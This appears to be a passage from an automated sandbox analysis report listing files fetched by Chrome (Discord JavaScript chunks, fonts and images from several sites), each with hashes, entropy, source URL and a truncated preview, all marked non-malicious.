                                                                          Entropy (8bit):5.513642402413137
                                                                          Encrypted:false
                                                                          SSDEEP:768:nrQOmi6GA9bZqFhVrbR2hXhKS6HFH4Jwsp/yRE2njdph/05gc82MqTLYIl7dc0mx:nTAt2Gy43Cjdph8tL+POcd5Rea
                                                                          MD5:376B97D1AF871F6A49EEFA5FF1C306D3
                                                                          SHA1:0465162D8D2627743497C1D665B253943B3AD2B2
                                                                          SHA-256:97A7CA75848ECA7177AF423390788593BEFD9263DBB8F46661079F99452704E5
                                                                          SHA-512:193D30E8852A9A77C76E7FC2D4DC2DCE833343749013C1D8A3DA00CF36F41E65D683017D9C7173377E3490DD12D9A8672DAA31789D6A4D9BB9ED61AB1C9F9A77
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/94816.5a175ba33d20e66d2eca.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["94816"],{223468:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o}});var i=n("872717"),l=n("819689"),a=n("49111"),s=n("782340"),o={changeNickname:(e,t,n,o)=>i.default.patch({url:a.Endpoints.GUILD_MEMBER_NICK(e,n),body:{nick:o},oldFormErrors:!0}).then(e=>{o=e.body.nick,l.default.sendBotMessage(t,null!=o&&""!==o?s.default.Messages.COMMAND_NICK_SUCCESS.plainFormat({nick:o}):s.default.Messages.COMMAND_NICK_RESET)},e=>{403===e.status?l.default.sendBotMessage(t,s.default.Messages.COMMAND_NICK_FAILURE_PERMISSION.plainFormat()):l.default.sendBotMessage(t,s.default.Messages.COMMAND_NICK_FAILURE)})}},81594:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return l}});var i=n("913144"),l={popFirstFile(e){i.default.dispatch({type:"UPLOAD_ATTACHMENT_POP_FILE",channelId:e})},addFiles(e){let{files:t,channelId:n,showLargeMessageDialog:l,draftType:a}=e;i.default.dispatch({type:"UPLOAD_ATTACHMENT_ADD
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 39764, version 2.66
                                                                          Category:downloaded
                                                                          Size (bytes):39764
                                                                          Entropy (8bit):7.993646621116526
                                                                          Encrypted:true
                                                                          SSDEEP:768:90TMDBOLlFMKbQDweRs+mkq4oY+VT6p+0t5LMXTkfm7s/U2Uq:6TppGKMDwtN4orTAHjMDja
                                                                          MD5:71D3E9DC2BCB8E91225BA9FAB588C8F2
                                                                          SHA1:D7E38EE4C245F64B78EB18E6ECD7B9F53B3254A8
                                                                          SHA-256:AE99AAEDE2F373187A4FE442A2CB0AB9C2945EFBAB01CF33E01BE517C0C4F813
                                                                          SHA-512:DEDA05EBD575D413AA2277876991ECC2EA238907390753485BA1B487EDE2F432363C46DAAD5F3F240EAAF8D3258150829A3AE3D2D9C420EA59567CFD440361A6
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/20ac37ed2576dd48d7dc.woff2
                                                                          Preview:wOF2.......T......}........B..........................z.. .`..P..D..W........S.6.$..`..r.. .....F..=[.W..ir.h......,......j..In.X....Uj..3...`K\t........".%.]..p..E........G..9&r...S.+.r.5....~`.....S'..1~.a..H...S.........N.tX2G7.u..m.z.!.......).w....V....:.6..W.\.+..j.K...[|.n..dg.....Kx:;....7?2.j..\...0..=zd.(...{.c.....}._..Q.....dUx....b.\Y,.........W.b.zkAX.,..X..jO..*w..% .[..DD.X..G\..?.9..\.G...#...T ..".$.Z.P...W..*5.b.._......}at.....@2.A.....m...5Oy....e.a...D...'.s.$...Q.......[.....A.....r..&....8.Q.KZ.#G...#_.~...yh1$.b~.0S[..6..+...../...jdlcC_0S..J.J!e.'...)3.O..}.C.)...v.qn.......5}.7{.m.b.&:.S..h>.hz..."N.G8..A..&.....s...3<...C... _.F$.`.J.....UuKv.ik.H.'....e..b-k..kt..!....Q.l.R)ai&....Dp..\T).O...'6.<....u..Wi*M.s....I@.....+.....=...&.6.N..n.....\..k...8.....P6.f..k{...3....5....C..T.iG.5....s...$W*..=^.*..3..V.._\..J..2`.........z........1....l.F... .zVb...0.Z..=........[2?.V.....J.....!4B.U..**.....>.Ta`0...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 48x48, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):1195
                                                                          Entropy (8bit):6.805189264150663
                                                                          Encrypted:false
                                                                          SSDEEP:24:V9YMWcv6monG4HVpbLIdUYHqiIalAKOrRlm1ekW08/QRkHQ5YH:V9YMfCmo9HjKKlm1e0XRWQ5YH
                                                                          MD5:FDDF7C77666F467B7CFA3635D4A89CA0
                                                                          SHA1:26941D00B859E6876FA9D0F97790DF3FECAA869E
                                                                          SHA-256:D544633EB8752D259DA12A8055ABE9BC3C7363919BBF9C993FC1AB0D56CC940F
                                                                          SHA-512:EFDB051F8D8C575FA941C6924ED1ED23CDCD163CE55C0AAD388B5F71F178FE87110A374F00FF1DFA1DB1CB51DC5F3A40EE9454402401AB8C9E7190B92C73B480
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75"
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......0.0.."............................................................................c.DP..U.z....cj.....{..Z.....i..w.%...g... ............................ 2...........3..a.J.z'.Y..+.m"U.lW.m.....3V.Eu6-.d{.....J......+...E...-%.. ....7...L]...*......................................?..v.#?...........................1.........?...Z[...b.....'......................!.."1A.Qa. #BR.........?...d..W....8.Cj....P.'.......{92.Nc....[.O.....xBY..|.CS.....7",..l9.Y.fT.. ...@7H:.&Z.k.e.P.3........!....................!1Qq.Aa............?!Q...p.2..t! ... .x.W.('...D.$',%..\...R{.XEYMS#6u.b..x^..n.W.s..CA..I1../.......Ov..u3..a....,-K~....)0.......jg.G..................>...........................1........?..u..............................!Q1.Aq.........?.....%.Q.N...,w....W...."....................!1AQaq..............?...HX....*......1.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (7852)
                                                                          Category:downloaded
                                                                          Size (bytes):7907
                                                                          Entropy (8bit):5.103691114192919
                                                                          Encrypted:false
                                                                          SSDEEP:96:BgSRVk6Wg8lh4Nrviin+nWPRkDhTt9qwqSBtxCMNMRV0IBSAMDuC+m6raxwrRBxf:SSRVmriDlPRkxtRJxNMRV0I4dKT9i0ou
                                                                          MD5:F0986FCFDC0641A2F3AEE655EFEB8A6E
                                                                          SHA1:761BF94F6BE23C58D5635CAB8C3BB6931BBA4AD5
                                                                          SHA-256:E491218F2B01660C8CE2CD1BE5D7681B253C644B57E6A392FC792449415F2187
                                                                          SHA-512:EF73BBA32E3C131252198319C01465594B88EB02944A198078267B90620750D1055D58C22469789D786E165413E913D4BD575FFE30936589254380263DC48394
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/40413.ee00763112ee8df65f08.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["40413"],{230606:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return g}}),n("222007"),n("424973"),n("854508"),n("808653"),n("70102");var r=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some(function(t,r){return t[0]===e&&(n=r,!0)}),n}return function(){function e(){this.__entries__=[]}return Object.defineProperty(e.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n){var r=t(this.__entries__,e);~r?this.__entries__[r][1]=n:this.__entries__.push([e,n])},e.prototype.delete=function(e){var n=this.__entries__,r=t(n,e);~r&&n.splice(r,1)},e.prototype.has=function(e){return!!~t(this.__entries__,e)},e.prototype.clear=function(){this.__entries__.splice(0)},e.prototype.forEach=function(t,e){void 0===e&&(e=null
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 640x214, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):19184
                                                                          Entropy (8bit):7.882628594538512
                                                                          Encrypted:false
                                                                          SSDEEP:384:hYNg77xIHwy4ZybGeym1rwEW1jhutKqozHPmdqe8wp:hYyow3ILym1r7QFMf4HPmz88
                                                                          MD5:103464CBECBA5AA0BD9F5D54395C0A9B
                                                                          SHA1:79D51EA1EAB9FD5ABE395B0EA39EBB405A3AB7E2
                                                                          SHA-256:A04137ED6BAE34F48762F8949143F13AF21F03A4536850F199D159E993FED628
                                                                          SHA-512:9F9F13540EB28DAF51692E52ACE02AB95034F07305F7BDE7D2EDA17695D614CF2ACFDF0ED974C82CDEB46F59B9105EB543A3CDDCF31B5FA779A03EDE18C6624B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/layer3.jpg
                                                                          Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):4142
                                                                          Entropy (8bit):4.213667731461687
                                                                          Encrypted:false
                                                                          SSDEEP:96:WYwvNCHI0IdGH7kucCQ4mHjTv13NMJVYkspCFnQPlfDGE:WYwvQ6A05X1OJoCFnUlfDGE
                                                                          MD5:FADF528FF8547BE361E337F467742E63
                                                                          SHA1:A5D4410B0F8B8169D41B708FA532DCCFCF2A02EC
                                                                          SHA-256:9E616AF20BEF0AA477C593F6CC1CBE058774002F4261D3B59DD5541A05EC0911
                                                                          SHA-512:41F9CE615B720A9C85E1C210FB97FE1B1B3B473BEDAD5557B4E27B742A40ABBD57636E0601BF207A82DD14EBC9C09F0768DFDE79D3160FCE43CF7C3E15BDDCB9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/revoke.svg
                                                                          Preview:<svg height="445.04544mm" viewBox="0 0 218.75303 44.504544" width="2187.5303mm" xmlns="http://www.w3.org/2000/svg"><g stroke-width=".264583" transform="translate(-62.63352 -53.603079)"><path d="m132.35681 95.00695-5.1816-15.951199c4.3688-1.6256 6.7564-5.3848 7.4168-9.6012 1.6256-10.1092-4.4704-12.7508-13.462-12.7508h-10.0076l-6.0452 38.303199h10.3632l1.6256-10.210799c.3048-1.8796.4572-3.7592.7112-5.6388l.1524-.1016 3.2004 15.951199zm-13.6652-20.624799 1.524-9.4488c2.8448-.1524 4.6736 1.27 4.1148 4.6228-.4064 2.4892-2.2352 4.8768-4.9784 4.8768z"/><path d="m135.73581 95.00695h19.2532l1.4224-9.042399h-8.89l.9144-5.842h7.9756l1.4224-9.0424h-7.9756l.8636-5.334h8.89l1.4224-9.0424h-19.2532z"/><path d="m177.34339 95.00695 16.4592-38.303199h-11.2268l-5.334 15.748c-1.016 3.0988-1.6764 6.1468-2.6416 9.2456h-.1016c.1016-3.0988.3556-6.1468.3556-9.2456l.0508-15.748h-10.8712l2.7432 38.303199z"/><path d="m192.68181 75.855351c-1.524 9.3472.9652 19.811999 11.4808 19.811999s16.256-10.464799 17.78-19.8119
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:dropped
                                                                          Size (bytes):6168
                                                                          Entropy (8bit):7.928258451249203
                                                                          Encrypted:false
                                                                          SSDEEP:192:PHsiKBVJ8qAyekfcdBluDmCElqaOEhAvwdFVJ9ayBUH:kiKBVJ1ekEdBluDNEXhAvwL9aH
                                                                          MD5:94C90D2805419205BEB6356CB82790D1
                                                                          SHA1:39EF2AEB74F5018668DB1441360A46D8C4420965
                                                                          SHA-256:D40DD53DF34C76FCFEFFF89CC24723E49B69D45B0B1D1B37A7BAA6F3EF5EEAE3
                                                                          SHA-512:CDB91C7D3DE2ECEBACA4BB338535240F6BF5BC5F4CA6AA9B1925A4B958A9CC45FEC474F89E1BD1C494DF104338B1FDDC248DA246C26DDD62BA06C26D29546219
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................J..........................!1.."AQ.2aq#b....5R.......$4BSTrs...6Dt..7Vd..................................3.........................!1A.Qa"q2B...#....$3.Rb.............?.xWk..|.}.r._W..E,R.)?.....:.y..e.E...|..C.q).i.$.s_6..Q...q.C..g.5..+...(...J-}Z.:...V..C....T....4;....Z....A...Q.}...t.......Q....>TdoG.*.y.#.....>u2.|..@:....G...).b.ry...QG-.}.o...Hz1.h...}].(H.+..}P.pu......).0dK.wt.jq{FN.......Wi..4..../.K......s.2....y......]^.V...;.J.[.#.E28.\.#.......U..bvw...P...Q}J....W.|D...W.1...Q#....t...s.4y.r...YFI...c...9....LG......V..N2iz.S....:5.Xr.T.iQ`.......t..Z~..|h.Kf:.y}.W.`rw.....>.....q.v-..B.Q-[..(.6..B._...Zu....Zd)......s..%..k...D^.z........Z$..(.H...<...'..rx.J...Z.-.6..f.........}.....hJg ...r?#..._.v..Wyz..1..w'...zR.XA.e# ...G..u...#`...(.`....M..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (16402)
                                                                          Category:downloaded
                                                                          Size (bytes):16457
                                                                          Entropy (8bit):5.528745021653968
                                                                          Encrypted:false
                                                                          SSDEEP:384:Sf0yH5pud0oRl7g+5B+q+C+6+t+R+r+t+u+3+l+rorpPY9RBGtx:Sf0osprpP2+x
                                                                          MD5:DE540BA62351EC2B42950CF325BEFF27
                                                                          SHA1:76ACF22519D057364AA39E83C3AC826941EF1CA2
                                                                          SHA-256:9C9109E1998F9E6FCAC75E8ACD8B61079D041D0ADC3E49B8570B81F359F11048
                                                                          SHA-512:8ECF2EFA01B43503AECA4D1AECA29573B8CE5BAA00E063FB961C9FFE696CB85A12134F4EE3778414797726EDB53E146CACCB02BCB8DD4BB5AD3384A7ACE1461D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/34426.aefa163dd8b10b7ac8cc.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["34426"],{564967:function(e,t,i){"use strict";i.r(t),i.d(t,{default:function(){return o}});var n=i("862205");let r=(0,n.createExperiment)({kind:"user",id:"2023-01_emoji_discovery_backfill",label:"Emoji Hotrail Backfill",defaultConfig:{shouldBackfillEmojis:!1},treatments:[{id:1,label:"Backfills Hotrail With Emojis",config:{shouldBackfillEmojis:!0}}]});var o=r},788506:function(e,t,i){"use strict";i.r(t),i.d(t,{useEmojiCategories:function(){return A},trackPremiumSettingsPaneOpened:function(){return h},trackEmojiSearchStart:function(){return M},trackEmojiSearchResultsViewed:function(){return R},trackEmojiSearchSelect:function(){return N},trackEmojiSearchEmpty:function(){return P},trackEmojiFocus:function(){return v},trackEmojiSelect:function(){return k},trackEmojiFavorited:function(){return F},getAriaIdForEmojiCategory:function(){return U},getStringForEmojiCategory:function(){return x},allowUnicodeEmojiForIntention:func
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65505), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):107021
                                                                          Entropy (8bit):5.634095633912645
                                                                          Encrypted:false
                                                                          SSDEEP:1536:bQKmR8yYhjQz/ZHgkX3HY440ych3wTnY7QansTErn1b5api:XyYI17Wnarn19N
                                                                          MD5:54D39199440355B2ADDCB1B4BEE23798
                                                                          SHA1:82D2A74982204488AAA8C6E38D72A03E95CE6310
                                                                          SHA-256:256C9A26CD0D77EADC25BE819857E18EA34D2116320D90322DF95144ED4AA128
                                                                          SHA-512:9B2347B09182311F788169EC633FAF2AEBD3AFD8CFA67BB65D93E98CDF1898A36746868EF75C581A9FB61FA2DD00BA8588BD0D082215BEE7753F4669990D4C73
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/e4c0cffdca343bc93615.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["3037"],{717837:function(e,t,n){"use strict";e.exports=function(e){return(e=String(e||""),l.test(e))?"rtl":i.test(e)?"ltr":"neutral"};var s=".-..-..-.",a="A-Za-z\xc0-\xd6\xd8-\xf6\xf8-..-..-...-..-..-.",l=RegExp("^[^"+a+"]*["+s+"]"),i=RegExp("^[^"+s+"]*["+a+"]")},975391:function(e,t,n){"use strict";e.exports=n.p+"d10009c626a2ff1d4b90.svg"},37920:function(e,t,n){"use strict";e.exports=n.p+"8754ac926b9fb38f56a8.svg"},2862:function(e,t,n){"use strict";e.exports=n.p+"8e55ff0ed3f6e4fa5200.svg"},501851:function(e,t,n){"use strict";e.exports=n.p+"3f977e0e1abeba5f6f4e.svg"},346619:function(e,t,n){"use strict";e.exports=n.p+"148ae41296600c88bc9e.svg"},245288:function(e,t,n){"use strict";e.exports=n.p+"41d28dc5d2c29dc4b122.svg"},314837:function(e,t,n){"use strict";e.exports=n.p+"c54752c825291a698843.svg"},951536:function(e,t,n){"use strict";e.exports=n.p+"be307e03c092df2ae51f.svg"},768025:functi
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):23337
                                                                          Entropy (8bit):7.986710200625998
                                                                          Encrypted:false
                                                                          SSDEEP:384:rw1zay3MCSBQcVwE12zPrteOMIdOUdJQLHWLe13SC/VjkDGsPUzc1hvH0H6DgpC:YTBS3CEIddOUdJ8HWLeFXkDGCicoH6DD
                                                                          MD5:5E4D41C20FAEA6FAE4B52EE2CE3AF30B
                                                                          SHA1:63FC5913406E60922948E1885711E9D1C4D3593B
                                                                          SHA-256:73BA0CCCA8C554E3DA6D86C6EF1DD41B4DB07F7172E2B34F114549650D42EFAA
                                                                          SHA-512:6367C50D6985B3B9B50EE72526A47B9B584247B1C795CA1E6F7E1552D733D06138572485A2DF0DADFA03D115617F938CBFC9C7695D93C75AA96DA9C4BAF9E7DF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..w\....=........P...=.....&...{....{.!(.T....Z....]..{.e....r]..uC0R{.>.s..P..~.!......}..\.....+..W....0a. X.../...}........5...k Py.........Q..I...n.....q...3.....xB...h.`...ql.].....Jf.9BbJ..p%&+qVf~..q~..O.l......P!..Q..../........?x.T.Q.xB9./8.}...'.........y.....,.[c.@.?..*,..'..c....q.1..B... lc..]...^......J@A...8. .....m.....5.2....?.E...1.;.nc.%..\..@.........7fJ..(._\....c.7...*...pJ.:.pc.....n..1....5..n.4..y............`L.F.M.>Bk...p......n....#....7A...1.F.M.>Bk...p......n....#....7A...1.F.M.>Bk...p......n....#....7A...1..w].......y.7T8..#......}.4]@........=...G........H...Q.m.,..K@.....P.....I....)......u.'............)\..p...(........+9(.SCS198..y"...B 'F.a.cg.&v........K...TH.I..A................a..#d.).n..d..L4M 1P..!i.....\a..=_jk.,.5..sL...V...N..|.....RiK..$.s.];..bC....f.....,..-...#e..._..[l.o....p.\.1........SIj..........P.....Rc..a.D.Y........j...X..>....m...xm.v..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (10475)
                                                                          Category:downloaded
                                                                          Size (bytes):10530
                                                                          Entropy (8bit):5.141413513140726
                                                                          Encrypted:false
                                                                          SSDEEP:96:Yoy8b4n9TYDviR62i7tkRRKFYp2syZ3waibR8tdDouisW3W0YWLkeSrTg3iwx0tw:hAEDvyouXKep9byt9oUWzSIye0trQn
                                                                          MD5:FA3D9476408D24313AAAA8D6794932FC
                                                                          SHA1:4AB50205305C760862E0892CDF69E397A73FAB7A
                                                                          SHA-256:1F9DC95A0409E1D5A703E72A1F03578BA3B0C28CC1E7177A2B7F46CD7056CD2A
                                                                          SHA-512:415B6C518419D6C4AD748D7AA18EB5CAF86701069B6F999CDB6EC26B33065F4AC373B6FD5867A61550E13400E8AB47EA0A0A5E5C65E4CE865FEC19C651A5E321
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/10991.d742d0d238c0d99e96ae.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["10991"],{339186:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return r}});var i=n("477150");function r(t,e){t.classList?t.classList.add(e):!(0,i.default)(t,e)&&("string"==typeof t.className?t.className=t.className+" "+e:t.setAttribute("class",(t.className&&t.className.baseVal||"")+" "+e))}},477150:function(t,e,n){"use strict";function i(t,e){return t.classList?!!e&&t.classList.contains(e):-1!==(" "+(t.className.baseVal||t.className)+" ").indexOf(" "+e+" ")}n.r(e),n.d(e,{default:function(){return i}})},281247:function(t,e,n){"use strict";function i(t,e){return t.replace(RegExp("(^|\\s)"+e+"(?:\\s|$)","g"),"$1").replace(/\s+/g," ").replace(/^\s*|\s*$/g,"")}function r(t,e){t.classList?t.classList.remove(e):"string"==typeof t.className?t.className=i(t.className,e):t.setAttribute("class",i(t.className&&t.className.baseVal||"",e))}n.r(e),n.d(e,{default:function(){return r}}),n("781738")},731042:function(t
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):30610
                                                                          Entropy (8bit):7.986682663164426
                                                                          Encrypted:false
                                                                          SSDEEP:768:wo4lu7AYwOEjJ/BSbkr+YxI9UDFi8h0oF+Tjmhy:wRlZYOBk4GCkoF+/mQ
                                                                          MD5:056AAB3CD80E061AAF99363A0A12C874
                                                                          SHA1:37BACEC2DB08DB55F7746B0820E25023348EB8E4
                                                                          SHA-256:0505584AD8AD9CF557B30779CC35234625C14229C7ED86AA897CC33280B9D2EA
                                                                          SHA-512:40A417BFFDE9CC2BEA69ABA8FBC9C3D291A76FB44706F3F5DC5ED166E40D29B9E205AD30A20028E70D079CEE9B7840E1B915EB2BF14F458B321198DDB0BD9FE3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_MAYC_7e6a35562a.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...xUW.S.K.".w..www..'..b..w/.PJK....@Kqww.N.3S...=!.v......2..<.9W.7..=...^k.#q..~..2.D......vM.Z....t.F....;\~...*~<.......3#.s.....@....%.t...x..R..tc........%....a.!......q......[..n.6.=4.NB..o....A.\.........+......>.^....-N.J.T.$...6..p.....'..z.p..+..._..<=1....E..l.F...W..'(.)....._.....{1c...I....lP.}.a.\..>x.)a/.X..0...._..~....O..0l...?.....l....b...7.....C..k..+...$...j....N...6....$...j....N...6....$...j....N...6......<.........q5..........=...v.nt.q.......v......'.7......G}...r..Z+.VZpx..7..y....N7...A..r.7.d...q.G*%..v.;7..X.bD.........Dgb$...Y.d.v'...........W....e.....gp\iw.V..W..)p5cNB.....k.....\..B.1.!..=eV<..)t....4.;../..c.y...]n<.u.N.+.>.,.Kakn;M.....ez`".].x..P......~"k.TYr......9`..\.......a.~..~f>.v...(m.....LSZ2.y1..6.Z..IKNd..................f(.~....2.C.!.m..-.....3....n.._.3.'.^.....u.7Kr.q.%.J..3+Y.<...'...Htq!....U5...8..iY.%%1.3.W.-y..i}Z..5..p
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (19252)
                                                                          Category:downloaded
                                                                          Size (bytes):19306
                                                                          Entropy (8bit):5.4667705987995
                                                                          Encrypted:false
                                                                          SSDEEP:192:TttFcruWCraFpb4QTil+i4Pig5pWfScZZHOe/EQE0crxXE1qSCnP1p+HdBUvD+AO:TtcrmaSmpW9iQE0qQ9BDP07HG
                                                                          MD5:9F4E2BF36060D1EA16A2245875A4ECB6
                                                                          SHA1:800A3C01CC46638F4A275C5BD3A5ED5BD71B69F3
                                                                          SHA-256:59C9CBB662554D62474D864E35E9826D899C55E3F350B34C382EF9E651EBE7B2
                                                                          SHA-512:98BF364111CEFD497A72CC2622AF958C36BCECE1B090BE5CFEB9E8B0264149AA153CA43ED6334ACE2348AC1BFB5DE930DB929E274525695FD33C5154B4202389
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/6086.1339c227c38e3c5b2586.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["6086"],{519705:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return c}}),n("222007"),n("702976");var a=n("872717"),l=n("819855"),i=n("913144"),d=n("679428"),s=n("282109"),r=n("568734"),o=n("34676"),u=n("49111"),f=n("397336"),g=n("782340"),c={open(e){i.default.dispatch({type:"NOTIFICATION_SETTINGS_MODAL_OPEN",guildId:e})},close(){i.default.dispatch({type:"NOTIFICATION_SETTINGS_MODAL_CLOSE"})},updateGuildNotificationSettings(e,t,n){let a=(0,o.getCurrentGuildSettings)(e);d.default.saveUserGuildSettings(e,t),i.default.dispatch({type:"USER_GUILD_SETTINGS_GUILD_UPDATE",guildId:e,settings:t}),(0,o.trackGuildNotificationSettingsUpdate)(e,t,a,n)},updateGuildAndChannelNotificationSettings(e,t,n){let a=Object.keys(t.channel_overrides),l=(0,o.getCurrentGuildSettings)(e),s=(0,o.getManyCurrentChannelSettings)(e,a);d.default.saveUserGuildSettings(e,t),i.default.dispatch({type:"USER_GUILD_SETTINGS_GUILD_AND_CHANNEL
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (13274)
                                                                          Category:downloaded
                                                                          Size (bytes):13329
                                                                          Entropy (8bit):5.6273482591230115
                                                                          Encrypted:false
                                                                          SSDEEP:384:0zfYl+aqRdU1VdhwckBNNLZReMJrmIKSULHIF8k4tGTMV36f:RVdhwnBNA+4A
                                                                          MD5:F7E567529CCC28CDB9EAE5B7412D4691
                                                                          SHA1:D7B2B89F63C311A34C3165F347AD5171B74389B3
                                                                          SHA-256:C75041BE2051AC0C14D46C743F793B1DAA8CF86B211CECAF278BCCE28FA3AAD2
                                                                          SHA-512:8B6EC59133844F9411302859D2BD7106C636A655C92D3ECE0E2940588431380888390D74FC61311C47D95C9576472FDDC0D8EFD08A4C4345B584EB4B5E33B0D4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/62597.1768a5537a0db3f9e8ac.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["62597"],{44771:function(e,t,s){"use strict";s.r(t),s.d(t,{default:function(){return S}}),s("222007");var a=s("37983"),i=s("884691"),n=s("414456"),r=s.n(n),l=s("917351"),d=s.n(l),u=s("77078"),c=s("164546"),o=s("513196"),T=s("42723"),m=s("605475"),E=s("49111"),h=s("782340"),I=s("279732");let _=()=>[h.default.Messages.APP_ICON_PIRATE,h.default.Messages.APP_ICON_PIRATE_1,h.default.Messages.APP_ICON_PIRATE_2,h.default.Messages.APP_ICON_PIRATE_3,h.default.Messages.APP_ICON_PIRATE_4],f=()=>{var e;return null!==(e=d.sample(_()))&&void 0!==e?e:h.default.Messages.APP_ICON_PIRATE};function Selection(e){let{id:t,className:s,onSelect:n,isSelected:l=!1,tabIndex:d,children:T}=e,[h,_]=i.useState(m.ICONS_BY_ID[t].name),S=t===o.PremiumAppIconIds.PIRATE,N=(0,u.useRadioItem)({label:h,isSelected:l});return(0,a.jsx)(u.Tooltip,{text:h,onTooltipShow:()=>S&&_(f()),children:e=>(0,a.jsxs)("div",{className:I.appIconSelectionContainer,children
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):27705
                                                                          Entropy (8bit):7.988389680450793
                                                                          Encrypted:false
                                                                          SSDEEP:768:o03dspa6XGEKT4bqlkn5ZGrVyTRrJMYjljw:o8apaREKTaqluPRrpjw
                                                                          MD5:40D0502625D9CA9C6BE2E2C32CC8BB67
                                                                          SHA1:9C63B4331A92B72A171740BF250436E59323E9A2
                                                                          SHA-256:F6899E71D91BF7170727067D73A6CA3FBE9CCBF8532E0A12A65063DD356B3D98
